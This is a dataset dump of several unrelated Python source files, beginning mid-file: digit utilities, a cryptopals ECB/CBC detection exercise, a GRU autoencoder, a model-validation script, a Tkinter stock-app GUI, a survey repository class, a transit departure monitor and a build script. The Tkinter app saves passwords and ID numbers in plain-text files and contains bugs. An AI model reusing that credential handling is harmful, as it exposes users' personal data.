list(reversed(digits(n)))[1:])\n\n yield pal\n\ndef palindrome_list(n):\n \"\"\"Returns a list of the first N Palindromes\"\"\"\n return [pal for pal in islice(palindrome_gen(), n)]\n\n#### Decimal expansions ####\ndef champernowne(Ndigits):\n \"\"\"Return the first Ndigits digits of Champernowne's constant as a list\"\"\"\n ret = []\n i = 1\n while len(ret) < Ndigits:\n ret.extend(digits(i))\n i += 1\n return ret\n\ndef decimal_expand(numerator, denominator, base=10, n_digits=100):\n \"\"\"Return a list containing the decimal representation of a proper fraction\"\"\"\n expansion = []\n for i in range(n_digits):\n n = numerator * (base ** i) // denominator\n expansion.append(digits(n)[-1])\n return expansion\n\n","sub_path":"common/digits.py","file_name":"digits.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233337203","text":"from tools import *\nimport os\nimport random\n'''\n\nSet 2 Challenge 11\n\nECB/CBC Detection Oracle\n\n'''\n\n\ndef encryption_oracle(plaintext):\n padded = bytearray(os.urandom(random.randint(5, 10)) + plaintext + 
os.urandom(random.randint(5, 10)))\n padded = bytes(pkcs7_padding(padded, 16))\n\n if random.randint(0, 1):\n print(\"ECB\")\n cipher = Cipher(algorithms.AES(os.urandom(16)), modes.ECB(), backend=default_backend())\n encryptor = cipher.encryptor()\n ciphertext = encryptor.update(padded) + encryptor.finalize()\n else:\n print(\"CBC\")\n cipher = Cipher(algorithms.AES(os.urandom(16)), modes.CBC(os.urandom(16)), backend=default_backend())\n encryptor = cipher.encryptor()\n ciphertext = encryptor.update(padded) + encryptor.finalize()\n\n return ciphertext\n\n\ndef is_ecb(ciphertext, block_size):\n if Counter(get_blocks(ciphertext, block_size)).most_common()[0][1] > 1:\n return True\n else:\n return False\n\nif __name__ == '__main__':\n input = bytes(\"meaningless jibber jabber\", 'ascii')\n\n for i in range(10):\n print(is_ecb(encryption_oracle(input), 16))\n","sub_path":"Set 2/03_ecb_cbc_detection_oracle.py","file_name":"03_ecb_cbc_detection_oracle.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233371797","text":"\nimport torch\nimport torch.nn as nn\n\nclass GRUBlock(nn.Module):\n def __init__(self, input_dim, hidden_dim, embed_dim, num_layers, dropout):\n super().__init__()\n self.gru = nn.GRU(input_size=input_dim, hidden_size=hidden_dim, num_layers=num_layers, dropout=dropout)\n self.linear = nn.Linear(in_features=hidden_dim, out_features=embed_dim) if hidden_dim != embed_dim else None\n def forward(self, input):\n x, hn = self.gru(input)\n if self.linear is not None:\n x = self.linear(x)\n return x, hn\n\nclass GRUAutoEncoder(nn.Module):\n def __init__(self, input_dim, hidden_dim, embed_dim, num_layers_encoder, num_layers_decoder, dropout=0.1):\n super().__init__()\n self.encoder = GRUBlock(input_dim, hidden_dim, embed_dim, num_layers_encoder, dropout)\n self.decoder = GRUBlock(embed_dim, hidden_dim, input_dim, num_layers_decoder, dropout)\n def forward(self, input):\n x, _ = self.encoder(input)\n x = x[-1, :, :].unsqueeze(0).repeat(input.shape[0], 1, 1)\n x, _ = self.decoder(x)\n return x\n\nclass GRUAutoEncoderAll(nn.Module):\n def __init__(self, input_dim, hidden_dim, embed_dim, num_layers_encoder, num_layers_decoder, dropout=0.1):\n super().__init__()\n assert embed_dim < input_dim\n self.encoder = GRUBlock(input_dim, hidden_dim, embed_dim, num_layers_encoder, dropout)\n self.decoder = GRUBlock(embed_dim, hidden_dim, input_dim, num_layers_decoder, dropout)\n def forward(self, input):\n x, _ = self.encoder(input)\n x, _ = self.decoder(x)\n return x\n","sub_path":"models/rnn/gru.py","file_name":"gru.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"572769351","text":"import json\nimport pickle\nfrom pathlib import Path\n\nimport click\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score, roc_auc_score\n\n\n@click.command()\n@click.option(\"--input-dir\")\n@click.option(\"--input-model-dir\")\ndef validate(input_model_dir: str, input_dir: str):\n input_model_path = Path(input_model_dir)\n input_dataset_path = Path(input_dir)\n\n with open(input_model_path / \"model\", \"rb\") as f:\n model = pickle.load(f)\n\n val_data = pd.read_csv(input_dataset_path / \"val.csv\")\n y_val_data = val_data[['target']]\n x_val_data = val_data.drop(['target'], axis=1)\n\n y = model.predict(x_val_data)\n\n metrics = {\n \"accuracy_score\": accuracy_score(y_val_data.values, y),\n \"roc_auc_score\": 
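# A shape check for the GRUAutoEncoder in the gru.py record above (illustrative sketch,
# assuming that class is importable). nn.GRU defaults to sequence-first tensors of shape
# (seq_len, batch, features); the encoder's final time step is repeated across all steps
# before decoding, so the reconstruction matches the input's shape.
import torch
model = GRUAutoEncoder(input_dim=8, hidden_dim=16, embed_dim=4,
                       num_layers_encoder=2, num_layers_decoder=2)
x = torch.randn(20, 3, 8)           # (seq_len=20, batch=3, input_dim=8)
assert model(x).shape == x.shape    # decoder's Linear maps hidden_dim back to input_dim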
roc_auc_score(y_val_data, y)\n }\n\n with open(input_model_path / \"metrics.json\", \"w\") as f:\n json.dump(metrics, f)\n\n\nif __name__ == \"__main__\":\n validate()\n","sub_path":"airflow-ml-dags/images/airflow-validate/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"32611899","text":"from Tkinter import *\nfrom PIL import ImageTk, Image\n\nclass Project(Frame):\n def __init__(self, master):\n Frame.__init__(self)\n self.img = ImageTk.PhotoImage(Image.open('stok.jpg'))\n self.panel = Label(self, image=self.img)\n self.panel.pack(side=\"bottom\", fill=\"both\", expand=\"yes\")\n\n self.button = Button(self, text=\"Home\", fg=\"red\", bg=\"blue\")\n self.button.grid(columnspan=2)\n self.button2 = Button(self, text=\"About Us\", fg=\"red\", bg=\"blue\", command=self.AboutUs)\n self.button2.grid(columnspan=2)\n self.button3 = Button(self, text=\"LogIn\", fg=\"red\", bg=\"blue\", command=self.LogIn)\n self.button3.grid(columnspan=5)\n\n self.pack(side=RIGHT)\n\n def AboutUs(self):\n Frame.__init__(self)\n self.button4 = Button(self, text=\"About Us\", fg=\"red\", bg=\"blue\")\n self.button4.grid(columnspan=2, row=3)\n self.button5 = Button(self, text=\"LogIn\", fg=\"red\", bg=\"blue\", command=self.LogIn)\n self.button5.grid(columnspan=2, row=4)\n\n self.label = Label(self,text=\"This is a simple stock prizes predictor system\\n based Linear Regression analysis method \\n and it uses the technologies like python and mysql database\")\n self.label.grid(row=1, sticky=E)\n\n\n\n self.pack(side=RIGHT)\n\n def LogIn(self):\n Frame.__init__(self)\n\n self.label2 = Label(self, text=\"Please Login In to The system\")\n self.label3 = Label(self, text=\"Username\")\n self.label3.grid(row=0, sticky=E)\n self.label4 = Label(self, text=\"Password\")\n self.label4.grid(row=1, sticky=E)\n self.entry = Entry(self)\n self.entry.grid(row=0, column=1)\n self.entry2 = Entry(self)\n self.entry2.grid(row=1, column=1)\n self.checkbutton = Checkbutton(self, text=\"Keep me logged in\")\n self.checkbutton.grid(columnspan=2)\n self.button6 = Button(self, text=\"Login\",command=self.Login_btn_clicked)\n self.button6.grid(columnspan=2)\n self.button7 = Button(self, text=\"Create an Account\", fg=\"red\", bg=\"blue\", command=self.SignUp)\n self.button7.grid(columnspan=4)\n\n\n self.button8 = Button(self, text=\"Home\", fg=\"red\", bg=\"blue\")\n self.button8.grid(columnspan=2)\n self.button9 = Button(self, text=\"About Us\", fg=\"red\", bg=\"blue\", command=self.AboutUs)\n self.button9.grid(columnspan=2)\n\n self.pack(side=RIGHT)\n\n def SignUp(self):\n Frame.__init__(self)\n\n self.label5 = Label(self, text=\"Enter the credentials\")\n self.label6 = Label(self, text=\"Username\")\n self.label7 = Label(self, text=\"Name\")\n self.label8 = Label(self, text=\"UIDAI No.\")\n self.label9 = Label(self, text=\"Email Id\")\n self.label10 = Label(self, text=\"Residential Address\")\n self.label11 = Label(self, text=\"Permanant Address\")\n self.label12 = Label(self, text=\"Mobile No.\")\n self.label13 = Label(self, text=\"Company Name\")\n self.label14 = Label(self, text=\"Password\")\n self.label15 = Label(self, text=\"Confirm Password\")\n self.entry3 = Entry(self)\n self.entry4 = Entry(self)\n self.entry5 = Entry(self)\n self.entry6 = Entry(self)\n self.entry7 = Entry(self)\n self.entry8 = Entry(self)\n self.entry9 = Entry(self)\n self.entry10 = Entry(self)\n self.entry11 = Entry(self, 
show=\"*\")\n self.entry12 = Entry(self, show=\"*\")\n self.label5.grid(row=1, sticky=E)\n self.label6.grid(row=2, sticky=E)\n self.label7.grid(row=3, sticky=E)\n self.label8.grid(row=4, sticky=E)\n self.label9.grid(row=5, sticky=E)\n self.label10.grid(row=6, sticky=E)\n self.label11.grid(row=7, sticky=E)\n self.label12.grid(row=8, sticky=E)\n self.label13.grid(row=9, sticky=E)\n self.label14.grid(row=10,sticky=E)\n self.label15.grid(row=11,sticky=E)\n self.entry3.grid(row=2, column=2)\n self.entry4.grid(row=3, column=2)\n self.entry5.grid(row=4, column=2)\n self.entry6.grid(row=5, column=2)\n self.entry7.grid(row=6, column=2)\n self.entry8.grid(row=7, column=2)\n self.entry9.grid(row=8, column=2)\n self.entry10.grid(row=9, column=2)\n self.entry11.grid(row=10, column=2)\n self.entry12.grid(row=11, column=2)\n self.checkbox2 = Checkbutton(self, text=\"I Agree Terms and Conditions \")\n self.checkbox2.grid(columnspan=2)\n\n self.button10 = Button(self, text=\"Create an Account\",bg=\"blue\",fg=\"red\",command=self.signup_btn_clicked)\n self.button10.grid(columnspan=3)\n\n self.button11 = Button(self, text=\"Home\", fg=\"red\", bg=\"blue\")\n self.button11.grid(columnspan=2)\n self.button12 = Button(self, text=\"About Us\", fg=\"red\", bg=\"blue\", command=self.AboutUs)\n self.button12.grid(columnspan=2)\n\n\n self.pack(side=RIGHT)\n\n def signup_btn_clicked(self):\n\n Frame.__init__(self)\n\n addhim = open(\"User-Signup.txt\", \"w\")\n addhim.write(\"\\nUsername:\" + self.entry3.get())\n addhim.write(\"\\nname :\" + self.entry4.get())\n addhim.write(\"\\nUIDAI No\" + self.entry5.get())\n addhim.write(\"\\nEmail Id\" + self.entry6.get())\n addhim.write(\"\\nResidential Address :\" + self.entry7.get())\n addhim.write(\"\\nPermanant Address :\" + self.entry8.get())\n addhim.write(\"\\nMobile No. 
:\" + self.entry9.get())\n addhim.write(\"\\nCompany Name :\" + self.entry10.get())\n addhim.write(\"\\nPassword :\" + self.entry11.get())\n addhim.write(\"\\nRetype Passsword :\" + self.entry12.get())\n addhim.close()\n\n self.button13 = Button(self, text=\"About Us\", fg=\"red\", bg=\"blue\", command=self.AboutUs)\n self.button13.grid(columnspan=2)\n self.button14 = Button(self, text=\"Login\", fg=\"red\", bg=\"blue\", command=self.LogIn)\n self.button14.grid(columnspan=2)\n\n self.pack()\n\n def Login_btn_clicked(self):\n Frame.__init__(self)\n\n adduser = open(\"User.txt\", \"w\")\n adduser.write(\"User ID: \" + self.entry.get())\n adduser.write(\"\\nUser Password: \" + self.entry2.get())\n adduser.close()\n\n self.button13 = Button(self, text=\"Dashboard\",command=self.Dashboard())\n self.button13.grid(comunspan=2)\n self.pack()\n\n\n def Dashboard(self):\n Frame.__init__(self)\n self.pack()\n\n\n\n\n\nroot = Tk()\npr = Project(root)\nroot.mainloop()\n","sub_path":"pred.py","file_name":"pred.py","file_ext":"py","file_size_in_byte":6441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"31004138","text":"from werkzeug.exceptions import NotFound\n\nfrom microsetta_private_api import localization\nfrom microsetta_private_api.repo.base_repo import BaseRepo\nfrom microsetta_private_api.model.survey_template import SurveyTemplate, \\\n SurveyTemplateLinkInfo\nfrom microsetta_private_api.model.survey_template_group import \\\n SurveyTemplateGroup\nfrom microsetta_private_api.model.survey_template_question import \\\n SurveyTemplateQuestion\nfrom microsetta_private_api.model.survey_template_trigger import \\\n SurveyTemplateTrigger\nimport copy\nimport secrets\n\nfrom microsetta_private_api.repo.sample_repo import SampleRepo\n\n\nclass SurveyTemplateRepo(BaseRepo):\n\n VIOSCREEN_ID = 10001\n SURVEY_INFO = {\n 1: SurveyTemplateLinkInfo(\n 1,\n \"Primary Questionnaire\",\n \"1.0\",\n \"local\"\n ),\n 2: SurveyTemplateLinkInfo(\n 2,\n \"Pet Information\",\n \"1.0\",\n \"local\"\n ),\n 3: SurveyTemplateLinkInfo(\n 3,\n \"Fermented Foods Questionnaire\",\n \"1.0\",\n \"local\"\n ),\n 4: SurveyTemplateLinkInfo(\n 4,\n \"Surfer Questionnaire\",\n \"1.0\",\n \"local\"\n ),\n 5: SurveyTemplateLinkInfo(\n 5,\n \"Personal Microbiome Information\",\n \"1.0\",\n \"local\"\n ),\n 6: SurveyTemplateLinkInfo(\n 6,\n \"COVID-19 Questionnaire\",\n \"1.0\",\n \"local\"\n ),\n VIOSCREEN_ID: SurveyTemplateLinkInfo(\n VIOSCREEN_ID,\n \"Vioscreen Food Frequency Questionnaire\",\n \"1.0\",\n \"remote\"\n )\n }\n\n def __init__(self, transaction):\n super().__init__(transaction)\n\n def list_survey_ids(self):\n with self._transaction.cursor() as cur:\n cur.execute(\"SELECT DISTINCT survey_id from surveys\")\n rows = cur.fetchall()\n return [x[0] for x in rows]\n\n @staticmethod\n def get_survey_template_link_info(survey_id):\n return copy.deepcopy(SurveyTemplateRepo.SURVEY_INFO[survey_id])\n\n def get_survey_template(self, survey_id, language_tag):\n tag_to_col = {\n localization.EN_US: \"survey_question.american\",\n localization.EN_GB: \"survey_question.british\",\n localization.ES_MX: \"survey_question.spanish\"\n }\n\n if language_tag not in tag_to_col:\n raise NotFound(\"Survey localization unavailable: %s\" %\n language_tag)\n\n with self._transaction.cursor() as cur:\n\n cur.execute(\n \"SELECT count(*) FROM surveys WHERE survey_id=%s\",\n (survey_id,)\n )\n if cur.fetchone()[0] == 0:\n raise NotFound(\"No such survey\")\n\n cur.execute(\n \"SELECT \"\n 
\"group_questions.survey_group, \"\n \"survey_question.survey_question_id, \" +\n tag_to_col[language_tag] + \", \" +\n \"survey_question.question_shortname, \"\n \"survey_question_response_type.survey_response_type \"\n \"FROM \"\n \"surveys \"\n \"LEFT JOIN group_questions ON \"\n \"surveys.survey_group = group_questions.survey_group \"\n \"LEFT JOIN survey_question ON \"\n \"group_questions.survey_question_id = \"\n \"survey_question.survey_question_id \"\n \"LEFT JOIN survey_question_response_type ON \"\n \"survey_question.survey_question_id = \"\n \"survey_question_response_type.survey_question_id \"\n \"WHERE surveys.survey_id = %s AND \"\n \"survey_question.retired = false \"\n \"ORDER BY group_questions.survey_group, \"\n \"group_questions.display_index\",\n (survey_id,))\n\n rows = cur.fetchall()\n\n all_groups = []\n cur_group_id = None\n cur_questions = None\n\n for r in rows:\n group_id = r[0]\n question_id = r[1]\n localized_text = r[2]\n short_name = r[3]\n response_type = r[4]\n if group_id != cur_group_id:\n if cur_group_id is not None:\n group_localized_text = self._get_group_localized_text(\n cur_group_id,\n language_tag)\n all_groups.append(SurveyTemplateGroup(\n group_localized_text,\n cur_questions))\n cur_group_id = group_id\n cur_questions = []\n\n responses = self._get_question_valid_responses(question_id,\n language_tag)\n triggers = self._get_question_triggers(question_id)\n\n # Quick fix to correctly sort country names in Spanish\n if language_tag == localization.ES_MX and \\\n (question_id == 110 or question_id == 148):\n responses[1:len(responses)] = \\\n sorted(responses[1:len(responses)])\n\n question = SurveyTemplateQuestion(question_id,\n localized_text,\n short_name,\n response_type,\n responses,\n triggers)\n cur_questions.append(question)\n\n if cur_group_id is not None:\n group_localized_text = self._get_group_localized_text(\n cur_group_id,\n language_tag)\n all_groups.append(SurveyTemplateGroup(\n group_localized_text,\n cur_questions))\n\n return SurveyTemplate(survey_id, language_tag, all_groups)\n\n def _get_group_localized_text(self, group_id, language_tag):\n tag_to_col = {\n localization.EN_US: \"american\",\n localization.EN_GB: \"british\",\n localization.ES_MX: \"spanish\"\n }\n with self._transaction.cursor() as cur:\n cur.execute(\"SELECT \" +\n tag_to_col[language_tag] + \" \" +\n \"FROM survey_group \"\n \"WHERE \"\n \"group_order = %s\", (group_id,))\n row = cur.fetchone()\n if row is None:\n return None\n return row[0]\n\n def _get_question_valid_responses(self, survey_question_id, language_tag):\n tag_to_col = {\n localization.EN_US: \"survey_response.american\",\n localization.EN_GB: \"survey_response.british\",\n localization.ES_MX: \"survey_response.spanish\",\n }\n\n with self._transaction.cursor() as cur:\n cur.execute(\"SELECT \" +\n tag_to_col[language_tag] + \" \"\n \"FROM \"\n \"survey_question_response \"\n \"LEFT JOIN \"\n \"survey_response \"\n \"ON \"\n \"survey_question_response.response = \"\n \"survey_response.american \"\n \"WHERE \"\n \"survey_question_id = %s \"\n \"ORDER BY \"\n \"display_index\", (survey_question_id,))\n return [x[0] for x in cur.fetchall()]\n\n def _get_question_triggers(self, survey_question_id):\n with self._transaction.cursor() as cur:\n cur.execute(\"SELECT triggering_response, triggered_question \"\n \"FROM \"\n \"survey_question_triggers \"\n \"WHERE \"\n \"survey_question_id = %s \", (survey_question_id,))\n\n rows = cur.fetchall()\n return [SurveyTemplateTrigger(x[0], x[1]) for x in 
rows]\n\n def create_vioscreen_id(self, account_id, source_id,\n vioscreen_ext_sample_id):\n with self._transaction.cursor() as cur:\n # This transaction scans for existing IDs,\n # then generates a new ID if none exist\n # To prevent workers from seeing stale state,\n # and thus each generating multiple new IDs\n # in the case of multiple workers,\n # we lock the vioscreen_registry table\n self._transaction.lock_table(\"vioscreen_registry\")\n # test if an existing ID is available\n existing = self.get_vioscreen_id_if_exists(account_id, source_id,\n vioscreen_ext_sample_id)\n if existing is None:\n vioscreen_id = secrets.token_hex(8)\n # Put a survey with status -1 into ag_login_surveys\n cur.execute(\"INSERT INTO ag_login_surveys(\"\n \"ag_login_id, \"\n \"survey_id, \"\n \"vioscreen_status, \"\n \"source_id) \"\n \"VALUES(%s, %s, %s, %s)\",\n (account_id, vioscreen_id, -1, source_id))\n # Immediately attach that survey to the specified sample\n sample_repo = SampleRepo(self._transaction)\n s = sample_repo.get_sample(account_id,\n source_id,\n vioscreen_ext_sample_id)\n\n if s is None:\n raise KeyError(f\"{vioscreen_ext_sample_id} does not exist\")\n\n cur.execute(\"INSERT INTO source_barcodes_surveys \"\n \"(barcode, survey_id) \"\n \"VALUES(%s, %s)\", (s.barcode, vioscreen_id))\n\n # And add it to the registry to keep track of the survey if\n # user quits out then wants to resume the survey.\n cur.execute(\"INSERT INTO vioscreen_registry(\"\n \"account_id, source_id, sample_id, vio_id) \"\n \"VALUES(%s, %s, %s, %s)\",\n (account_id, source_id, vioscreen_ext_sample_id,\n vioscreen_id))\n else:\n vioscreen_id = existing\n return vioscreen_id\n\n def get_vioscreen_id_if_exists(self, account_id, source_id,\n vioscreen_ext_sample_id):\n \"\"\"Obtain a vioscreen ID if it exists\"\"\"\n with self._transaction.cursor() as cur:\n # Find an active vioscreen survey for this account+source+sample\n # (deleted surveys are not active)\n cur.execute(\"SELECT vio_id FROM vioscreen_registry WHERE \"\n \"account_id=%s AND \"\n \"source_id=%s AND \"\n \"sample_id=%s AND \"\n \"deleted=false\",\n (account_id, source_id, vioscreen_ext_sample_id))\n rows = cur.fetchall()\n if rows is None or len(rows) == 0:\n return None\n else:\n return rows[0][0]\n\n def fetch_user_basic_physiology(self, account_id, source_id):\n \"\"\"Given an account and source ID, obtain basic physiology properties\n\n Parameters\n ----------\n account_id : str, UUID\n The account UUID\n source_id : str, UUID\n The source UUID\n\n Notes\n -----\n The original intention with this method was to provide basic host\n detail to Viocare for the reports they produce. 
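# create_vioscreen_id above locks vioscreen_registry before its exists-check so that two
# workers cannot both observe "no ID yet" and mint duplicates. The same check-then-insert
# discipline in miniature, using an in-process lock and hypothetical names (illustrative
# sketch, not from the record):
import secrets
import threading

_registry = {}
_registry_lock = threading.Lock()

def get_or_create_vio_id(key):
    with _registry_lock:  # serialize the read-then-write, like lock_table() in the repo
        if key not in _registry:
            _registry[key] = secrets.token_hex(8)
        return _registry[key]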
By default,\n Viocare interprets height and weight as standard.\n\n Returns\n -------\n tuple, (int or None, int or None, float or None, float or None)\n The tuple contents are (birth year, gender, height, weight).\n \"\"\"\n UNSPECIFIED = 'Unspecified'\n\n with self._transaction.cursor() as cur:\n # from survey_answers for non-free text fields\n cur.execute(\"\"\"SELECT question_shortname, q.response\n FROM ag_login_surveys AS s\n JOIN survey_answers AS q\n ON s.survey_id = q.survey_id\n JOIN survey_question\n USING (survey_question_id)\n WHERE question_shortname IN (\n 'HEIGHT_UNITS',\n 'WEIGHT_UNITS',\n 'BIRTH_YEAR',\n 'GENDER')\n AND s.ag_login_id = %s\n and s.source_id = %s\"\"\",\n (account_id, source_id))\n\n results = {name: value for name, value in cur.fetchall()}\n birth_year = results.get('BIRTH_YEAR')\n gender = results.get('GENDER')\n height_units = results.get('HEIGHT_UNITS')\n weight_units = results.get('WEIGHT_UNITS')\n\n # from survey_answers_other for height/weight\n cur.execute(\"\"\"SELECT question_shortname, q.response\n FROM ag_login_surveys AS s\n JOIN survey_answers_other AS q\n ON s.survey_id = q.survey_id\n JOIN survey_question\n USING (survey_question_id)\n WHERE question_shortname IN (\n 'HEIGHT_CM',\n 'WEIGHT_KG')\n AND s.ag_login_id = %s\n and s.source_id = %s\"\"\",\n (account_id, source_id))\n\n results = {name: value for name, value in cur.fetchall()}\n height = results.get('HEIGHT_CM')\n weight = results.get('WEIGHT_KG')\n\n # normalize the return values\n if birth_year is not None and birth_year.isdigit():\n birth_year = int(birth_year)\n else:\n birth_year = None\n\n if gender is not None and gender == UNSPECIFIED:\n gender = None\n\n # This sucks.\n if height == UNSPECIFIED or weight_units == UNSPECIFIED:\n height = None\n elif height is not None:\n if height.startswith('['):\n # old survey_answers_other responses are of the form\n # '[\"foo\"]' :/\n # TODO: patch all old answers to remove extraneous [\"\"]?\n height = height[2:-2]\n\n if height == \"\":\n height = None\n else:\n height = float(height)\n if height_units == 'centimeters':\n # to inches\n height = height / 2.54\n else:\n # should not occur but just in case\n height = None\n\n if weight == UNSPECIFIED or weight_units == UNSPECIFIED:\n weight = None\n elif weight is not None:\n if weight.startswith('['):\n # old survey_answers_other responses are of the form\n # '[\"foo\"]' :/\n weight = weight[2:-2]\n if weight == \"\":\n weight = None\n else:\n weight = float(weight)\n if weight_units == 'kilograms':\n # to pounds\n weight = weight * 2.20462\n else:\n # should not occur but just in case\n weight = None\n\n return (birth_year, gender, height, weight)\n","sub_path":"microsetta_private_api/repo/survey_template_repo.py","file_name":"survey_template_repo.py","file_ext":"py","file_size_in_byte":16104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"326186606","text":"import urllib.request\nimport json\nfrom datetime import datetime\nimport time\nimport Adafruit_CharLCD as LCD\n\nstoppesteder = {\n 'Lakkegata Skole': '3010532'\n}\n\nlcd = LCD.Adafruit_CharLCDPlate()\nlcd.set_color(0.0, 0.0, 0.0)\n\nlcd.clear()\nlcd.message(\"Loading...\")\n\ndef refresh(skole):\n data = urllib.request.urlopen(\"http://reisapi.ruter.no/StopVisit/GetDepartures/3010532\").read().decode(\"utf8\")\n parsed = json.loads(data)\n\n now = datetime.now()\n\n avganger = []\n\n for avgang in range(2):\n avgangData = parsed[avgang]['MonitoredVehicleJourney']\n\n 
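# A worked check of the unit conversions in the SurveyTemplateRepo record above, which
# hands Viocare standard units (illustrative numbers, not from the record):
height_in = 170 / 2.54      # 170 cm -> ~66.93 inches
weight_lb = 70 * 2.20462    # 70 kg  -> ~154.32 pounds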
destinasjon = avgangData['DestinationName']\n linjenummer = avgangData['PublishedLineName']\n vogntype = avgangData['VehicleMode'] #3 = trikk?\n avgangstid = datetime.strptime(avgangData['MonitoredCall']['ExpectedDepartureTime'].split(\"+\")[0].split(\".\")[0], \"%Y-%m-%dT%H:%M:%S\") #2018-08-22T16:40:00\n eta = avgangstid - now\n retning = int(avgangData[\"DirectionRef\"])\n \n if retning == 2:\n avganger.append({\n 'destinasjon': destinasjon,\n 'linjenummer': linjenummer,\n 'vogntype': vogntype,\n 'avganstid': avgangstid,\n 'eta': eta\n })\n \n return avganger\n\nmonitoring = True\nwhile monitoring:\n avganger = refresh(\"Lakkegata Skole\")\n\n payload = \"\"\n\n for linje in range(min(2, len(avganger))):\n avgang = avganger[linje]\n\n preDest = str(avgang['linjenummer']) + \" \"\n postDest = \" \" + str(int((datetime(1,1,1) + avgang['eta']).strftime('%M'))) + \"m\"\n destPad = avgang[\"destinasjon\"][:(16 - (len(preDest) + len(postDest)))] + \" \" * (16 - (len(preDest) + len(postDest) + len(avgang[\"destinasjon\"])))\n payload += preDest + destPad + postDest + \"\\n\"\n \n lcd.clear()\n lcd.message(payload)\n print(payload)\n\n time.sleep(30)","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272362765","text":"#!/usr/bin/env python3\n#\n# The MIT License (MIT)\n#\n# Copyright (c) 2018 David Medina\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#\n\nfrom setuptools.command import build_ext\nfrom setuptools import setup, find_packages, Extension\nimport os\nimport sys\nimport numpy as np\n\n\nclass OccaInstaller(build_ext.build_ext):\n '''Compile occa.git'''\n\n def sys_call(self, command):\n self.spawn(command.split(' '))\n\n def pre_build(self):\n # Build occa and copy libocca.so to occa/c\n self.sys_call('make -C occa.git -j4')\n\n def post_build(self):\n # Change the rpath location for finding libocca.so\n occa_c_path = os.path.dirname(self.get_ext_fullpath('occa.c.device'))\n libocca_so = os.path.abspath('./occa.git/lib/libocca.so')\n\n # Copy libocca.so to build directory\n self.copy_file('occa.git/lib/libocca.so', occa_c_path)\n\n if sys.platform == 'darwin':\n for output in self.get_outputs():\n self.sys_call('install_name_tool'\n ' -change'\n ' {libocca_so}'\n ' @loader_path/libocca.so'\n ' {output}'.format(libocca_so=libocca_so,\n output=output))\n\n def run(self):\n self.pre_build()\n build_ext.build_ext.run(self)\n self.post_build()\n\n\ndef get_ext_module(module):\n return Extension(\n name='occa.c.{module}'.format(module=module),\n sources=['occa/c/{module}.cpp'.format(module=module)],\n include_dirs=[\n 'occa/c',\n 'occa.git/include',\n np.get_include(),\n ],\n depends=['occa/c/libocca.so'],\n libraries=['occa'],\n library_dirs=['occa.git/lib'],\n extra_compile_args=['-Wno-unused-function'],\n extra_link_args=['-Wl,-rpath,$ORIGIN'],\n )\n\n\next_modules = [\n get_ext_module(module)\n for module in ['device', 'exception', 'kernel', 'memory']\n]\n\n\npackage_data = {\n 'occa.c': ['*.so'],\n}\n\n\nlong_description = ('''\nIn a nutshell, OCCA (like oca-rina) is an open-source library which aims to:\n\n- Make it easy to program different types of devices (e.g. CPU, GPU, FPGA)\n\n- Provide a unified API for interacting with backend device APIs (e.g. OpenMP, CUDA, OpenCL)\n\n- Use just-in-time compilation to build backend kernels\n\n- Provide a kernel language, a minor extension to C, to abstract programming for each backend\n''')\n\n\nsetup(\n name='occa',\n version='0.2.0',\n description='Portable Approach for Parallel Architectures',\n long_description=long_description,\n url='https://libocca.org',\n author='David Medina',\n cmdclass={\n 'build_ext': OccaInstaller,\n },\n packages=find_packages(),\n ext_modules=ext_modules,\n package_data=package_data,\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"71909655","text":"\"\"\"\nClasses of the places in the game.\n\nBase class is places.Base()\n\"\"\"\n\nfrom os.path import dirname, basename, isfile, join\nimport glob\nimport importlib\n\nmodules = glob.glob(join(dirname(__file__), \"*.py\"))\nfiles = [ basename(f)[:-3] for f in modules if isfile(f) and not f.endswith('__init__.py')]\nfor element in files:\n module = importlib.import_module(f\"places.{element}\")\n globals().update(\n {n: getattr(module, n) for n in module.__all__} if hasattr(module, '__all__') \n else \n {k: v for (k, v) in module.__dict__.items() if not k.startswith('_')\n })\n\nprint(\"Importing places...\")\ncount = 0\nfor element in files:\n count+=1\n print(f\"{count}. 
